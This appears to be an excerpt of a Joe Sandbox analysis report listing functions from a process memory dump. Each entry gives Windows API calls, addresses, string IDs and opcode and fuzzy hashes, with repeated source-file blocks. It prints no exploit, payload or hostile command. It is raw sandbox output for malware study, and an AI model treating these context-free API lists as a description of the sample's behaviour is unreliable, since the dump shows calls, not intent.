                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0073a8c1db36c574e274d5b26c3deb7d5f7284b1add46c550e8641e3f8e90ecb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85903e1f4fcfe158c2ef8273ab1545899d094a0beff387e29c69ab73327cb330
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0073a8c1db36c574e274d5b26c3deb7d5f7284b1add46c550e8641e3f8e90ecb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA31C1B1908604AFDB10AB56DC84FBB3BA9EB84316F104115FA0DF71E4EB74A948CB25
                                                                                                                                                                                                                                                                                                    Function 00E22AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E22AF9
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00E22B98
                                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00E22D7D
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00E63A1B
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00E63A80
                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E63AAD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 85722338462e5a4fd1a87e56f1a8a382d61aa0b258769a2e16ab3f6314a4c19e
                                                                                                                                                                                                                                                                                                    • Instruction ID: d52fae7f882638707d82228ad949cc1be7f40ab46f274514d22dcadf7f3acaca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85722338462e5a4fd1a87e56f1a8a382d61aa0b258769a2e16ab3f6314a4c19e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD19E31741222DFCB29EF64E845A69F7A0FF04754F1162ADE54A7B261CB30AD12CF40
                                                                                                                                                                                                                                                                                                    Function 00E98835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E989F2
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98A06
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E98A30
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E98A4A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98A5C
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98AA5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E98AF5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20c1ad14ab669aa2e8587abf8fc43b0e9b8bc93329712d7da6af554fab60e0da
                                                                                                                                                                                                                                                                                                    • Instruction ID: dfe43797a4ddbba82f0faf94a4d48dc97c121e11d8bdf264555af4fede9e29dc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20c1ad14ab669aa2e8587abf8fc43b0e9b8bc93329712d7da6af554fab60e0da
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B81B1729042459FCF24EF14C944ABEB3E8BF86314F54682EF889F7260DB34D9448B92
                                                                                                                                                                                                                                                                                                    Function 00EB88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00EB8992
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00EB899E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EB8A79
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00EB8AAC
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00EB8AE4
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00EB8B06
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EB8B1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33b42e16774603ab56e75b4e21a73f52a233ea01724b9835d58ff5605f1a3e57
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a45d77ac23243f60b237001633fb5c6e2f9326dabbbf1615af26c5b02dc9acf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b42e16774603ab56e75b4e21a73f52a233ea01724b9835d58ff5605f1a3e57
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C71AA34600204AFDF219FA5CA85FFBBBB9EF89304F14245AE94977361CB31A944CB11
                                                                                                                                                                                                                                                                                                    Function 00E27447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00E274D7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: GetClientRect.USER32(?,?), ref: 00E2758D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: GetWindowRect.USER32(?,?), ref: 00E275CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: ScreenToClient.USER32(?,?), ref: 00E275F6
                                                                                                                                                                                                                                                                                                    • GetDC.USER32 ref: 00E66083
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E66096
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E660A4
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E660B9
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00E660C1
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E66152
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf1e5cff669290b6ded9bfcd0ad8a1f2e699735c014bbbf90b4382015a7c10a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a875d4848a30394286b41ee6fd5e3e163a81a1de9df5eaec6a21e8481c2eaef
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf1e5cff669290b6ded9bfcd0ad8a1f2e699735c014bbbf90b4382015a7c10a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81710130500205EFCF219F64EC84AFA7BB5FF493A8F14626AED997A266C7318C44DB50
                                                                                                                                                                                                                                                                                                    Function 00E9CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E9CCB7
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E9CCDF
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E9CD0F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E9CD67
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00E9CD7B
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00E9CD86
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f3ee2459bc56eb0e1966d0aff19f0c953b781a09b11e520b2ec6395bf32d70d
                                                                                                                                                                                                                                                                                                    • Instruction ID: a1f2c3b4e24eae3a88f3e5003597bf9457f7e0799115a970770033b62f6ffb07
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f3ee2459bc56eb0e1966d0aff19f0c953b781a09b11e520b2ec6395bf32d70d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D317FB1504204AFDB21AF658C88AAB7BFCEB45744B24552AF446A2210EB34DD089BA1
                                                                                                                                                                                                                                                                                                    Function 00E8A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E655AE,?,?,Bad directive syntax error,00EBDCD0,00000000,00000010,?,?), ref: 00E8A236
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00E655AE,?), ref: 00E8A23D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E8A301
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65c4b94868435ea3641f8f5e8b01e6fbb992da40b8ee6cb46fad268acf8d3211
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac2794043727d834c2d91d3613daff2ea592d4071b2aa64a2dcc6fdf340a0814
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65c4b94868435ea3641f8f5e8b01e6fbb992da40b8ee6cb46fad268acf8d3211
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48216F3280021EEFDF12BB90DC06EEE7BB9BF18300F045465F519750A2EB719618DB11
                                                                                                                                                                                                                                                                                                    Function 00E829EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00E829F8
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00E82A0D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E82A9A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9946d736c1f59d013853c9b22a47138c6cdd0bc78845552b30920edf55842143
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c657a4912797df389489d302614ce9aba1c42fb588dac20332155992d06ca9a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9946d736c1f59d013853c9b22a47138c6cdd0bc78845552b30920edf55842143
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5110A76788707BDF6197221EC06DA737DC8F14B64B20216AF60DF40D1FB6268004614
                                                                                                                                                                                                                                                                                                    Function 00E27567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E2758D
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E275CE
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00E275F6
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E2773A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E2775B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fb22519f53e2e02a88b83514e729d2f3deaf73e7140e927cbc9b547baf63d04d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a4bb7c1af8c4754b0bbf56c5e9596ad92228f52da7621f75ee9f566205746ea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb22519f53e2e02a88b83514e729d2f3deaf73e7140e927cbc9b547baf63d04d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C18B3891465AEFDB10CFA8D940BEEBBF1FF08314F14A41AE899B3250D734A940DB60
                                                                                                                                                                                                                                                                                                    Function 00E5D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a54f89727abc9722392ebf9dabc026fb9cb032443d8de94d176d0c17c34b2cfd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c33442bb5e79a0a77051aaf82962f6eee3162a9df0875ef8136f62572bbffd2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a54f89727abc9722392ebf9dabc026fb9cb032443d8de94d176d0c17c34b2cfd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0613571909304AFDB31AF79DC816AE7BE49F42326F042DADED04B7291D63299488791
                                                                                                                                                                                                                                                                                                    Function 00EB5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EB5C24
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00EB5C65
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00EB5C6B
                                                                                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EB5C6F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB79F2: DeleteObject.GDI32(00000000), ref: 00EB7A1E
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB5CAB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB5CB8
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EB5CEB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EB5D25
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EB5D34
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
